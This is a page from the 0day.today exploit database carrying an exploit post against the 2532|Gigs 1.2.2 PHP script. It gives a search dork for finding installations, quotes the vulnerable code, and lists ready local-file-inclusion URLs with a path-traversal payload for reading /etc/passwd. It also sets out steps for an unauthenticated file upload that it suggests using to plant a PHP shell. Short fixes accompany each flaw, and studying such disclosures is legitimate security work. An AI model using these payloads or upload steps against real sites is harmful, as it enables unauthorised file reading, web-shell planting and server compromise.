0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
2532|Gigs 1.2.2 Stable Multiple Remote Vulnerabilities
====================================================== 2532|Gigs 1.2.2 Stable Multiple Remote Vulnerabilities ====================================================== [START] ######################################################################################### [0x01] Informations: Script : 2532|Gigs v1.2 Stable Download : http://www.hotscripts.com/jump.php?listing_id=65863&jump_type=1 Dork : Powered by 2532|Gigs v1.2.2 Vulnerability : Local File Inclusion / Remote File Upload Author : Osirys Website : http://osirys.org Notes : Proud to be Italian Greets: : XaDoS, x0r, emgent, Jay, Todd and AlpHaNiX ######################################################################################### [0x02] Bug: [Multiple Local File Inclusions] ###### Bugged file is: /[path]/settings.php Bugged file is: /[path]/deleteuser.php Bugged file is: /[path]/mini_calendar.php Bugged file is: /[path]/manage_venues.php Bugged file is: /[path]/manage_gigs.php * There are a lot of other files vulnerable to LFI ! [CODE] <?php /* 2532|Gigs v1.1 www.2532gigs.com ./settings.php */ // Load the settings.php language file include_once("languages/$language/settings.php"); [/CODE] settings.php page starts in this way. Includes a non declarate variable -> $language [!] FIX: Declare $language var. [!] EXPLOIT: /[path]/settings.php?language=[local_file_to_include] [!] EXPLOIT: /[path]/deleteuser.php?language=[local_file_to_include] [!] EXPLOIT: /[path]/mini_calendar?language=[local_file_to_include] [!] EXPLOIT: /[path]/manage_venues.php?language=[local_file_to_include] [!] EXPLOIT: /[path]/manage_gigs.php?language=[local_file_to_include] ../../../../../../../../../../etc/passwd%00 ######################################################################################### [0x03] Bug: [Remote File Upload] ###### Bugged file is: /[path]/upload_flyer.php [CODE] if (isset($_POST['submitflyer'])) { if (strlen($_FILES['banner']['name']) > 0) { $target = "flyers/".$_FILES['banner']['name']; move_uploaded_file($_FILES['banner']['tmp_name'], $target); // Other code, like it cheeks if /[path]/flyers dir is writable or not ! [/CODE] As we can see, everyone can upload everything that he wants. There is not login required, and there isn't a cheek for the extension of the file that is going to be uploaded. So, an unregistered user can upload a file of any extension, like a .php file. Why not a php shell ? [!] FIX: Before the upload script, just cheek if the user is registered, and then allow him only to upload .gif/jpg or the extension you want, not .php or other extensions ! [!] EXPLOIT: 1) Go to: /path/upload_flyer.php 2) Select your local file to upload 3) Press submit button 4) Cheek your file at: /[path]/flyers/your_local_file.your_extension ######################################################################################### [/END] # 0day.today [2024-11-16] #